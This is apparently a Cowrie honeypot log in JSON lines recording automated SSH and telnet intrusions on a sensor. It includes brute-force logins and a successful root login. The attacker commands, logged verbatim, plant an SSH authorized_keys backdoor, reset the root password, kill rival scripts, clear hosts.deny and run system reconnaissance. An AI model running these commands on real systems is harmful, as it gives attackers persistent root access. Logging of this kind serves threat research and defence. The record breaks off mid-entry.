{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:12:57.627024Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:12:57.831475Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:12:57.832357Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":54392,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a9b1de8b0a3","protocol":"ssh","message":"New connection: 14.103.112.104:54392 (1.2.3.4:22) [session: 6a9b1de8b0a3]","sensor":"my-vps","timestamp":"2025-09-09T05:12:58.027379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:12:58.028715Z","src_ip":"14.103.112.104","session":"6a9b1de8b0a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:12:58.228112Z","src_ip":"14.103.112.104","session":"6a9b1de8b0a3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:12:59.026007Z","src_ip":"14.103.112.104","session":"6a9b1de8b0a3"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:01.096579Z","src_ip":"14.103.112.104","session":"6a9b1de8b0a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:07.336679Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T05:13:07.337340Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:07.536272Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:07.997720Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"echo \"root:2tHvM7qIYIuq\"|chpasswd|bash","message":"CMD: echo \"root:2tHvM7qIYIuq\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T05:13:07.998453Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/580fea2513ac3db8a38db7d60a1f1a0ee8f8751fc22710119c955624c444a9d4","size":21,"shasum":"580fea2513ac3db8a38db7d60a1f1a0ee8f8751fc22710119c955624c444a9d4","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/580fea2513ac3db8a38db7d60a1f1a0ee8f8751fc22710119c955624c444a9d4 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:08.199826Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:08.657783Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T05:13:08.658487Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T05:13:08.860658Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:08.861598Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:09.354246Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T05:13:09.354974Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:09.555583Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:10.371409Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T05:13:10.372128Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:10.574597Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:11.083467Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T05:13:11.084382Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T05:13:11.085282Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:11.287604Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:11.747583Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T05:13:11.748470Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:11.946732Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:12.372871Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T05:13:12.373760Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:12.573771Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:13.080351Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T05:13:13.081178Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:13.280728Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":47435,"dst_ip":"1.2.3.4","dst_port":23,"session":"a56778f3bfab","protocol":"telnet","message":"New connection: 60.19.222.5:47435 (1.2.3.4:23) [session: a56778f3bfab]","sensor":"my-vps","timestamp":"2025-09-09T05:13:13.476967Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:13.730245Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T05:13:13.730927Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:13.932720Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:14.346925Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T05:13:14.347604Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:14.975642Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:15.430379Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-09T05:13:15.431101Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:15.629269Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:16.043569Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T05:13:16.044253Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:16.242787Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:16.725670Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T05:13:16.726328Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:16.924548Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:17.375757Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T05:13:17.376560Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:17.581691Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:13:18.417873Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T05:13:18.418674Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:18.622177Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.closed","duration":"36.1","message":"Connection lost after 36.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:18.623412Z","src_ip":"14.103.112.104","session":"2b959c644f97"}
{"eventid":"cowrie.session.closed","duration":12.963844537734985,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:26.440761Z","src_ip":"60.19.222.5","session":"a56778f3bfab"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":47706,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b0e5bbca8fe","protocol":"telnet","message":"New connection: 60.19.222.5:47706 (1.2.3.4:23) [session: 5b0e5bbca8fe]","sensor":"my-vps","timestamp":"2025-09-09T05:13:26.603593Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":55636,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c506384ed78","protocol":"ssh","message":"New connection: 14.103.112.104:55636 (1.2.3.4:22) [session: 0c506384ed78]","sensor":"my-vps","timestamp":"2025-09-09T05:13:35.703241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:13:35.707777Z","src_ip":"14.103.112.104","session":"0c506384ed78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:13:35.897598Z","src_ip":"14.103.112.104","session":"0c506384ed78"}
{"eventid":"cowrie.session.closed","duration":12.850617170333862,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:39.454139Z","src_ip":"60.19.222.5","session":"5b0e5bbca8fe"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":47861,"dst_ip":"1.2.3.4","dst_port":23,"session":"bca55246d6c0","protocol":"telnet","message":"New connection: 60.19.222.5:47861 (1.2.3.4:23) [session: bca55246d6c0]","sensor":"my-vps","timestamp":"2025-09-09T05:13:39.771028Z"}
{"eventid":"cowrie.login.success","username":"root","password":"qqww","message":"login attempt [root/qqww] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:13:40.927581Z","src_ip":"14.103.112.104","session":"0c506384ed78"}
{"eventid":"cowrie.session.closed","duration":12.785194635391235,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:13:52.556153Z","src_ip":"60.19.222.5","session":"bca55246d6c0"}
{"eventid":"cowrie.session.connect","src_ip":"60.19.222.5","src_port":48019,"dst_ip":"1.2.3.4","dst_port":23,"session":"5efac9f48360","protocol":"telnet","message":"New connection: 60.19.222.5:48019 (1.2.3.4:23) [session: 5efac9f48360]","sensor":"my-vps","timestamp":"2025-09-09T05:13:52.673107Z"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":46600,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1db7cf72509","protocol":"ssh","message":"New connection: 14.103.112.104:46600 (1.2.3.4:22) [session: f1db7cf72509]","sensor":"my-vps","timestamp":"2025-09-09T05:13:53.342228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:13:53.346329Z","src_ip":"14.103.112.104","session":"f1db7cf72509"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.